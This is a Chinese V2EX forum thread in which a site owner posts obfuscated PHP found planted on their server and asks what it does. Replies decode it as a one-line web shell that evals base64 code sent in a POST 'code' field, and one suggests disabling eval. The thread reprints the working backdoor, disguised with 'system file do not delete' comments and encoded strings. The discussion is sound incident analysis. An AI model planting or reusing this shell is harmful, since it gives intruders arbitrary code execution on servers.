首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
广告
isy
V2EX  ›  问与答

网站被植入这样的代码,能翻译下么?想知道他是干嘛的。。

  •   
  •   isy · 2013-01-29 11:20:29 +08:00 · 4222 次点击
    这是一个创建于 4303 天前的主题,其中的信息可能已经有所发展或是发生改变。
    <?php //cb6f82f3e4007bdaccf419abafab94c8
    $_=
    //system file do not delete
    'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
    //system file do not delete
    $__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
  • x65
  • system
  • file
    13 条回复    1970-01-01 08:00:00 +08:00
    mechille
        1
    mechille  
       2013-01-29 11:22:28 +08:00
    空间商植入的?
    isy
        2
    isy  
    OP
       2013-01-29 11:25:24 +08:00
    @mechille 应该是利用上传漏洞上传的。
    clww
        3
    clww  
       2013-01-29 11:29:26 +08:00   ❤️ 1
    if(isset($_POST["code"]))
    {
    eval(base64_decode($_POST["code"]));
    }
    xavierskip
        4
    xavierskip  
       2013-01-29 11:29:55 +08:00
    base64 编码
    isy
        5
    isy  
    OP
       2013-01-29 11:43:12 +08:00
    @clww @xavierskip 后面这段呢?

    $___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
    isy
        6
    isy  
    OP
       2013-01-29 11:50:32 +08:00
    明白了。。

    $___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; 等于 base64_decode
    nazor
        7
    nazor  
       2013-01-29 11:50:46 +08:00
    是比较加密过的一句话。
    shinwood
        8
    shinwood  
       2013-01-29 11:55:39 +08:00 via iPhone
    可以执行任意PHP代码的一个Hook。
    SuperOS
        9
    SuperOS  
       2013-01-29 11:56:19 +08:00
    webshell 服务器端
    solo7net
        10
    solo7net  
       2013-01-29 13:16:28 +08:00
    传说中的一句话马?
    inroading
        11
    inroading  
       2013-01-30 08:28:10 +08:00
    一字马
    holystrike
        12
    holystrike  
       2013-01-30 09:28:19 +08:00 via iPhone
    服务器上把eval函数禁了
    mozutaba
        13
    mozutaba  
       2013-02-03 01:45:30 +08:00
    一句话,dangrous没拼错吧
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1253 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 23:43 · PVG 07:43 · LAX 15:43 · JFK 18:43
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.